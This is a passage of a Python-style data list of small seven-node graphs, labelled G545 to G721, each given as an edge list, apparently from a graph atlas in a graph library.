[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [3, 2], [4, 7]]],
['edgelist',
'G545',
7,
[[1, 2], [2, 3], [1, 3], [4, 1], [4, 2], [4, 3], [1, 6], [6, 5], [5, 7]]],
['edgelist',
'G546',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [5, 6], [6, 4], [2, 6], [1, 7]]],
['edgelist',
'G547',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [2, 6], [6, 3], [6, 1], [5, 7]]],
['edgelist',
'G548',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [3, 5], [6, 2], [1, 7]]],
['edgelist',
'G549',
7,
[[1, 2], [3, 6], [1, 3], [6, 4], [4, 2], [4, 3], [6, 2], [7, 5], [7, 1]]],
['edgelist',
'G550',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 2], [6, 3], [1, 7]]],
['edgelist',
'G551',
7,
[[7, 4], [2, 3], [7, 6], [4, 5], [7, 5], [1, 6], [7, 1], [7, 2], [7, 3]]],
['edgelist',
'G552',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [7, 3], [6, 7], [3, 6]]],
['edgelist',
'G553',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [4, 5], [7, 6], [7, 1]]],
['edgelist',
'G554',
7,
[[2, 5], [3, 5], [3, 4], [1, 5], [4, 2], [5, 6], [1, 6], [7, 5], [7, 4]]],
['edgelist',
'G555',
7,
[[5, 2], [6, 5], [7, 6], [4, 7], [3, 4], [2, 3], [6, 3], [1, 6], [3, 1]]],
['edgelist',
'G556',
7,
[[5, 2], [4, 2], [3, 4], [5, 1], [6, 1], [6, 3], [6, 5], [7, 5], [6, 7]]],
['edgelist',
'G557',
7,
[[2, 1], [3, 2], [7, 3], [4, 7], [6, 4], [5, 6], [4, 5], [3, 4], [1, 3]]],
['edgelist',
'G558',
7,
[[1, 3], [6, 1], [2, 6], [3, 2], [5, 3], [6, 5], [7, 6], [4, 7], [3, 4]]],
['edgelist',
'G559',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [6, 7], [1, 7], [2, 4], [5, 2]]],
['edgelist',
'G560',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 5], [6, 2], [7, 2], [1, 7]]],
['edgelist',
'G561',
7,
[[1, 5], [2, 1], [5, 2], [4, 5], [3, 4], [7, 3], [6, 7], [2, 6], [3, 2]]],
['edgelist',
'G562',
7,
[[1, 2], [3, 1], [4, 3], [5, 4], [2, 5], [3, 2], [6, 4], [7, 6], [4, 7]]],
['edgelist',
'G563',
7,
[[7, 6], [4, 7], [3, 4], [1, 5], [1, 6], [2, 1], [3, 1], [2, 3], [6, 5]]],
['edgelist',
'G564',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 4], [6, 2], [7, 2], [1, 7]]],
['edgelist',
'G565',
7,
[[6, 3], [7, 6], [4, 7], [3, 4], [1, 3], [5, 1], [6, 5], [2, 6], [1, 2]]],
['edgelist',
'G566',
7,
[[3, 5], [2, 3], [5, 2], [6, 5], [1, 6], [2, 1], [7, 5], [4, 7], [3, 4]]],
['edgelist',
'G567',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [1, 2], [5, 1], [2, 5], [4, 2], [1, 4]]],
['edgelist',
'G568',
7,
[[1, 6], [7, 1], [2, 7], [5, 2], [3, 5], [4, 3], [2, 4], [6, 2], [7, 6]]],
['edgelist',
'G569',
7,
[[7, 6], [4, 7], [3, 4], [6, 3], [1, 6], [2, 1], [5, 2], [1, 5], [3, 1]]],
['edgelist',
'G570',
7,
[[1, 5], [4, 1], [2, 4], [5, 2], [3, 5], [7, 3], [6, 7], [3, 6], [4, 3]]],
['edgelist',
'G571',
7,
[[2, 1], [5, 2], [6, 5], [1, 6], [7, 1], [4, 7], [3, 4], [1, 3], [4, 5]]],
['edgelist',
'G572',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 1], [7, 2], [7, 4]]],
['edgelist',
'G573',
7,
[[1, 2], [2, 3], [3, 4], [1, 4], [5, 2], [6, 5], [6, 4], [7, 1], [7, 5]]],
['edgelist',
'G574',
7,
[[1, 2], [5, 1], [2, 5], [3, 2], [6, 3], [5, 6], [7, 6], [4, 7], [3, 4]]],
['edgelist',
'G575',
7,
[[2, 1], [7, 4], [1, 5], [6, 1], [4, 6], [6, 7], [2, 3], [2, 5], [7, 3]]],
['edgelist',
'G576',
7,
[[7, 3], [6, 7], [3, 6], [2, 3], [1, 4], [5, 1], [2, 5], [4, 2], [4, 5]]],
['edgelist',
'G577',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 2], [6, 7], [7, 1]]],
['edgelist',
'G578',
7,
[[1, 5], [2, 1], [3, 2], [4, 3], [1, 4], [3, 5], [6, 5], [7, 6], [4, 7]]],
['edgelist',
'G579',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [5, 3], [7, 2], [6, 7]]],
['edgelist',
'G580',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [1, 5], [6, 4], [6, 5], [7, 2], [7, 6]]],
['edgelist',
'G581',
7,
[[1, 2], [2, 3], [3, 4], [4, 5], [5, 6], [1, 6], [7, 1], [7, 5], [7, 3]]],
['edgelist',
'G582',
7,
[[1, 5], [4, 1], [5, 4], [7, 2], [6, 7], [2, 6], [3, 2], [6, 3], [7, 3]]],
['edgelist',
'G583',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[1, 3]]],
['edgelist',
'G584',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 5]]],
['edgelist',
'G585',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 1]]],
['edgelist',
'G586',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 1]]],
['edgelist',
'G587',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[6, 5],
[4, 6],
[2, 6]]],
['edgelist',
'G588',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 5]]],
['edgelist',
'G589',
7,
[[2, 1],
[5, 2],
[1, 5],
[6, 1],
[5, 6],
[4, 5],
[2, 4],
[6, 2],
[3, 4],
[2, 3]]],
['edgelist',
'G590',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 3]]],
['edgelist',
'G591',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[5, 2]]],
['edgelist',
'G592',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[6, 3]]],
['edgelist',
'G593',
7,
[[1, 2],
[3, 5],
[1, 3],
[5, 6],
[4, 2],
[4, 3],
[5, 2],
[6, 2],
[6, 3],
[6, 4]]],
['edgelist',
'G594',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[6, 4],
[6, 5]]],
['edgelist',
'G595',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[1, 3],
[2, 4],
[6, 2]]],
['edgelist',
'G596',
7,
[[1, 2],
[2, 3],
[4, 5],
[1, 3],
[4, 1],
[3, 5],
[6, 3],
[2, 6],
[5, 2],
[4, 6]]],
['edgelist',
'G597',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[6, 4],
[3, 6],
[2, 1]]],
['edgelist',
'G598',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 3],
[3, 7]]],
['edgelist',
'G599',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 3],
[2, 7]]],
['edgelist',
'G600',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[2, 7]]],
['edgelist',
'G601',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[1, 7]]],
['edgelist',
'G602',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[4, 7]]],
['edgelist',
'G603',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[5, 6],
[5, 7]]],
['edgelist',
'G604',
7,
[[3, 1],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[5, 4],
[4, 7]]],
['edgelist',
'G605',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 6],
[3, 7]]],
['edgelist',
'G606',
7,
[[3, 1],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[5, 4],
[3, 7]]],
['edgelist',
'G607',
7,
[[3, 4],
[2, 3],
[5, 2],
[6, 5],
[3, 6],
[1, 3],
[5, 1],
[1, 2],
[6, 1],
[7, 6]]],
['edgelist',
'G608',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[1, 5],
[6, 7]]],
['edgelist',
'G609',
7,
[[3, 1],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[5, 4],
[5, 7]]],
['edgelist',
'G610',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[5, 6],
[7, 6]]],
['edgelist',
'G611',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[2, 4],
[5, 2],
[3, 5],
[1, 4],
[6, 7]]],
['edgelist',
'G612',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[7, 6]]],
['edgelist',
'G613',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[1, 7]]],
['edgelist',
'G614',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[3, 7]]],
['edgelist',
'G615',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[2, 7]]],
['edgelist',
'G616',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[4, 7]]],
['edgelist',
'G617',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[1, 5],
[2, 1],
[5, 2],
[1, 7]]],
['edgelist',
'G618',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[2, 7]]],
['edgelist',
'G619',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[6, 5],
[5, 1],
[6, 1],
[1, 7]]],
['edgelist',
'G620',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[4, 7]]],
['edgelist',
'G621',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[6, 7]]],
['edgelist',
'G622',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[4, 7]]],
['edgelist',
'G623',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[1, 7]]],
['edgelist',
'G624',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[3, 1],
[6, 4],
[3, 4],
[7, 3]]],
['edgelist',
'G625',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[7, 5],
[7, 3]]],
['edgelist',
'G626',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[3, 7]]],
['edgelist',
'G627',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[6, 7]]],
['edgelist',
'G628',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[4, 1],
[5, 7]]],
['edgelist',
'G629',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[4, 7]]],
['edgelist',
'G630',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[6, 5],
[5, 1],
[6, 1],
[3, 7]]],
['edgelist',
'G631',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[3, 1],
[6, 7]]],
['edgelist',
'G632',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[3, 7]]],
['edgelist',
'G633',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[3, 1],
[6, 4],
[3, 4],
[1, 7]]],
['edgelist',
'G634',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[2, 7]]],
['edgelist',
'G635',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[5, 7]]],
['edgelist',
'G636',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[7, 5],
[7, 1]]],
['edgelist',
'G637',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[6, 7]]],
['edgelist',
'G638',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[1, 5],
[2, 1],
[5, 2],
[6, 7]]],
['edgelist',
'G639',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[3, 1],
[1, 7]]],
['edgelist',
'G640',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[5, 2],
[2, 1],
[6, 2],
[3, 7]]],
['edgelist',
'G641',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[3, 7]]],
['edgelist',
'G642',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[6, 7]]],
['edgelist',
'G643',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[1, 7]]],
['edgelist',
'G644',
7,
[[1, 2],
[2, 3],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[6, 5],
[5, 1],
[6, 1],
[6, 7]]],
['edgelist',
'G645',
7,
[[1, 2],
[2, 3],
[3, 4],
[1, 4],
[5, 1],
[5, 2],
[5, 3],
[5, 4],
[7, 6],
[7, 5]]],
['edgelist',
'G646',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[5, 1],
[2, 7]]],
['edgelist',
'G647',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[5, 7]]],
['edgelist',
'G648',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[5, 7]]],
['edgelist',
'G649',
7,
[[5, 4],
[1, 5],
[2, 1],
[3, 2],
[4, 3],
[1, 6],
[6, 4],
[1, 4],
[2, 6],
[3, 7]]],
['edgelist',
'G650',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[1, 7]]],
['edgelist',
'G651',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[6, 7]]],
['edgelist',
'G652',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[2, 7]]],
['edgelist',
'G653',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[3, 6],
[1, 6],
[3, 1],
[6, 2],
[4, 7]]],
['edgelist',
'G654',
7,
[[5, 4],
[5, 2],
[2, 3],
[6, 5],
[3, 6],
[4, 2],
[6, 4],
[4, 3],
[7, 1],
[7, 3]]],
['edgelist',
'G655',
7,
[[2, 1],
[3, 2],
[4, 3],
[5, 4],
[6, 5],
[2, 6],
[7, 2],
[5, 7],
[3, 7],
[6, 3]]],
['edgelist',
'G656',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[1, 7]]],
['edgelist',
'G657',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[4, 7]]],
['edgelist',
'G658',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[3, 7]]],
['edgelist',
'G659',
7,
[[1, 2],
[3, 6],
[1, 3],
[4, 1],
[4, 2],
[4, 3],
[3, 2],
[6, 2],
[7, 6],
[7, 5]]],
['edgelist',
'G660',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[2, 7]]],
['edgelist',
'G661',
7,
[[2, 4],
[3, 2],
[1, 3],
[6, 1],
[5, 6],
[4, 5],
[4, 3],
[1, 4],
[3, 5],
[6, 7]]],
['edgelist',
'G662',
7,
[[2, 6],
[5, 2],
[1, 5],
[6, 1],
[3, 6],
[5, 3],
[4, 5],
[6, 4],
[3, 1],
[2, 7]]],
['edgelist',
'G663',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 5],
[6, 3],
[6, 4],
[2, 7]]],
['edgelist',
'G664',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[5, 3],
[6, 3],
[2, 7]]],
['edgelist',
'G665',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[4, 1],
[6, 3],
[6, 1],
[6, 2],
[5, 7]]],
['edgelist',
'G666',
7,
[[3, 4],
[1, 3],
[4, 1],
[5, 4],
[2, 5],
[6, 2],
[5, 6],
[2, 1],
[6, 3],
[5, 7]]],
['edgelist',
'G667',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[1, 4],
[6, 3],
[5, 2],
[1, 7]]],
['edgelist',
'G668',
7,
[[5, 1],
[2, 5],
[4, 2],
[3, 4],
[2, 3],
[7, 2],
[1, 7],
[6, 1],
[2, 6],
[1, 2]]],
['edgelist',
'G669',
7,
[[4, 3],
[7, 4],
[6, 7],
[1, 6],
[3, 1],
[6, 3],
[2, 6],
[3, 2],
[5, 3],
[6, 5]]],
['edgelist',
'G670',
7,
[[3, 1],
[2, 3],
[4, 2],
[1, 4],
[7, 1],
[2, 7],
[6, 2],
[1, 6],
[5, 1],
[2, 5]]],
['edgelist',
'G671',
7,
[[7, 5],
[2, 3],
[7, 6],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4]]],
['edgelist',
'G672',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 4]]],
['edgelist',
'G673',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[1, 6],
[6, 3],
[7, 2],
[3, 7]]],
['edgelist',
'G674',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 1],
[6, 3],
[7, 3],
[1, 7]]],
['edgelist',
'G675',
7,
[[7, 5],
[2, 3],
[7, 6],
[4, 5],
[5, 6],
[1, 6],
[7, 4],
[7, 2],
[7, 3],
[1, 5]]],
['edgelist',
'G676',
7,
[[2, 1],
[3, 2],
[1, 3],
[4, 3],
[5, 4],
[3, 5],
[6, 3],
[5, 6],
[7, 5],
[2, 7]]],
['edgelist',
'G677',
7,
[[1, 2],
[1, 4],
[1, 5],
[1, 6],
[1, 7],
[2, 3],
[2, 4],
[2, 5],
[3, 6],
[3, 7]]],
['edgelist',
'G678',
7,
[[1, 3],
[6, 1],
[5, 6],
[3, 5],
[2, 3],
[6, 2],
[7, 6],
[4, 7],
[3, 4],
[3, 7]]],
['edgelist',
'G679',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 2],
[1, 6],
[7, 1],
[3, 7]]],
['edgelist',
'G680',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 3],
[7, 5],
[1, 3],
[5, 1]]],
['edgelist',
'G681',
7,
[[1, 5],
[4, 1],
[3, 4],
[6, 3],
[7, 6],
[3, 7],
[5, 3],
[2, 5],
[4, 2],
[5, 4]]],
['edgelist',
'G682',
7,
[[2, 7],
[3, 2],
[1, 3],
[2, 1],
[5, 2],
[4, 5],
[3, 4],
[6, 7],
[5, 6],
[4, 2]]],
['edgelist',
'G683',
7,
[[7, 6],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[7, 5]]],
['edgelist',
'G684',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[6, 4]]],
['edgelist',
'G685',
7,
[[1, 2],
[2, 3],
[3, 4],
[6, 5],
[1, 5],
[6, 1],
[6, 4],
[6, 3],
[7, 6],
[7, 2]]],
['edgelist',
'G686',
7,
[[1, 4],
[3, 1],
[2, 3],
[4, 2],
[5, 4],
[3, 5],
[1, 5],
[7, 1],
[6, 7],
[1, 6]]],
['edgelist',
'G687',
7,
[[1, 4],
[3, 1],
[2, 3],
[4, 2],
[5, 4],
[1, 6],
[1, 5],
[7, 1],
[6, 7],
[2, 5]]],
['edgelist',
'G688',
7,
[[1, 2],
[7, 6],
[3, 4],
[4, 5],
[7, 5],
[1, 6],
[7, 1],
[7, 2],
[7, 3],
[5, 3]]],
['edgelist',
'G689',
7,
[[2, 3],
[6, 2],
[7, 6],
[3, 7],
[2, 7],
[6, 3],
[5, 2],
[1, 5],
[4, 1],
[2, 4]]],
['edgelist',
'G690',
7,
[[5, 3],
[7, 3],
[6, 4],
[5, 2],
[3, 1],
[7, 4],
[6, 3],
[1, 2],
[1, 5],
[7, 1]]],
['edgelist',
'G691',
7,
[[5, 3],
[4, 7],
[6, 4],
[6, 2],
[3, 1],
[7, 1],
[6, 3],
[2, 5],
[1, 5],
[6, 5]]],
['edgelist',
'G692',
7,
[[5, 1],
[6, 5],
[5, 2],
[3, 2],
[4, 3],
[1, 4],
[4, 5],
[6, 4],
[7, 2],
[7, 6]]],
['edgelist',
'G693',
7,
[[1, 5],
[2, 1],
[3, 2],
[5, 3],
[4, 5],
[6, 4],
[5, 6],
[6, 3],
[7, 4],
[3, 7]]],
['edgelist',
'G694',
7,
[[2, 7],
[3, 2],
[1, 3],
[2, 1],
[5, 2],
[4, 5],
[3, 4],
[6, 7],
[5, 6],
[5, 7]]],
['edgelist',
'G695',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 4],
[7, 2],
[7, 6],
[6, 2]]],
['edgelist',
'G696',
7,
[[2, 1],
[5, 2],
[1, 5],
[3, 1],
[4, 3],
[7, 4],
[6, 7],
[1, 6],
[6, 3],
[7, 3]]],
['edgelist',
'G697',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 4],
[6, 2],
[6, 5],
[7, 2],
[6, 7]]],
['edgelist',
'G698',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[3, 5],
[5, 2],
[7, 2],
[7, 6]]],
['edgelist',
'G699',
7,
[[1, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[3, 2],
[6, 4],
[3, 6],
[7, 2],
[5, 7]]],
['edgelist',
'G700',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 3],
[6, 5],
[7, 6],
[7, 1],
[1, 3]]],
['edgelist',
'G701',
7,
[[3, 1],
[6, 3],
[2, 6],
[1, 2],
[4, 1],
[6, 4],
[7, 6],
[5, 7],
[1, 5],
[5, 4]]],
['edgelist',
'G702',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[5, 3],
[2, 6],
[7, 3],
[7, 6]]],
['edgelist',
'G703',
7,
[[6, 1],
[7, 6],
[3, 7],
[4, 3],
[1, 4],
[5, 1],
[3, 5],
[5, 4],
[2, 5],
[4, 2]]],
['edgelist',
'G704',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[7, 4],
[6, 7],
[4, 6],
[5, 6],
[5, 7]]],
['edgelist',
'G705',
7,
[[6, 3],
[3, 2],
[4, 3],
[5, 4],
[2, 5],
[6, 1],
[7, 2],
[7, 1],
[2, 6],
[3, 7]]],
['edgelist',
'G706',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 3],
[7, 5],
[5, 3],
[6, 2]]],
['edgelist',
'G707',
7,
[[5, 3],
[3, 4],
[5, 2],
[1, 2],
[4, 1],
[7, 5],
[1, 7],
[6, 1],
[5, 6],
[2, 6]]],
['edgelist',
'G708',
7,
[[3, 2],
[6, 3],
[4, 6],
[1, 4],
[5, 1],
[7, 5],
[4, 7],
[2, 4],
[5, 2],
[6, 5]]],
['edgelist',
'G709',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 2],
[6, 3],
[7, 6],
[7, 4]]],
['edgelist',
'G710',
7,
[[1, 2],
[5, 1],
[2, 5],
[3, 2],
[6, 3],
[5, 6],
[7, 6],
[4, 7],
[3, 4],
[6, 4]]],
['edgelist',
'G711',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 6],
[7, 2],
[7, 3],
[5, 3]]],
['edgelist',
'G712',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 1],
[6, 4],
[6, 3],
[7, 6],
[7, 5]]],
['edgelist',
'G713',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 4],
[7, 3],
[5, 1]]],
['edgelist',
'G714',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 5],
[7, 6],
[7, 4]]],
['edgelist',
'G715',
7,
[[1, 6],
[7, 1],
[2, 7],
[1, 2],
[2, 6],
[3, 2],
[4, 3],
[5, 4],
[7, 5],
[5, 6]]],
['edgelist',
'G716',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 6],
[7, 5],
[3, 1]]],
['edgelist',
'G717',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[7, 1],
[7, 2],
[7, 6],
[7, 4]]],
['edgelist',
'G718',
7,
[[3, 2],
[3, 1],
[4, 3],
[5, 4],
[2, 5],
[6, 2],
[6, 1],
[7, 1],
[2, 7],
[7, 6]]],
['edgelist',
'G719',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[1, 5],
[6, 4],
[6, 2],
[7, 2],
[7, 5],
[7, 6]]],
['edgelist',
'G720',
7,
[[1, 2],
[2, 3],
[3, 4],
[4, 5],
[5, 6],
[1, 6],
[6, 3],
[5, 2],
[7, 1],
[6, 7]]],
['edgelist',
'G721',
7,
[[4, 2],
